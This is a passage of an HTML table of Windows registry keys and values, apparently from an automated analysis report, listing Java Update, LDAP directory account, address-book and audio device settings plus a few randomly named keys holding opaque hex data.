<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateFinishTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">VersionXmlURL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateSchedule</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000011</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateScheduleMinutes</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000001a</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">Frequency</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000020</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateInvokedTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Direct3D</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication</span></td>
<td><span style="color: black; font-size: xx-small;">Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"java.exe"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager</span></td>
<td><span style="color: black; font-size: xx-small;">Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager</span></td>
<td><span style="color: black; font-size: xx-small;">Default LDAP Account</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Active Directory GC"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">PreConfigVer</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">PreConfigVerNTDS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">ConnectionSettingsMigrated</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">AssociatedID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Active Directory"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Bind DN</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Port</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000cc4</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Resolve Flag</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Secure Connection</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP User Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Base</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Bigfoot Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"ldap.bigfoot.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.bigfoot.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VeriSign Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"directory.verisign.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.verisign.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Base</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WhoWhere Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"ldap.whowhere.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.whowhere.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Rowi</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Rowi</span></td>
<td><span style="color: black; font-size: xx-small;">Xoywarsu</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Siabvu</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">OlkContactRefresh</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">OlkFolderRefresh</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">FirstRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">FriendlyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Default MidiOut Device"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{07B65360-C445-11CE-AFDE-00AA006C14F4}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">FilterData</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">MidiOutId</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:ffffffff</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">FriendlyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Default DirectSound Device"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{79376820-07D0-11CF-A24D-0020AFD79767}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">FilterData</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">DSGuid</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00000000-0000-0000-0000-000000000000}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy</span></td>
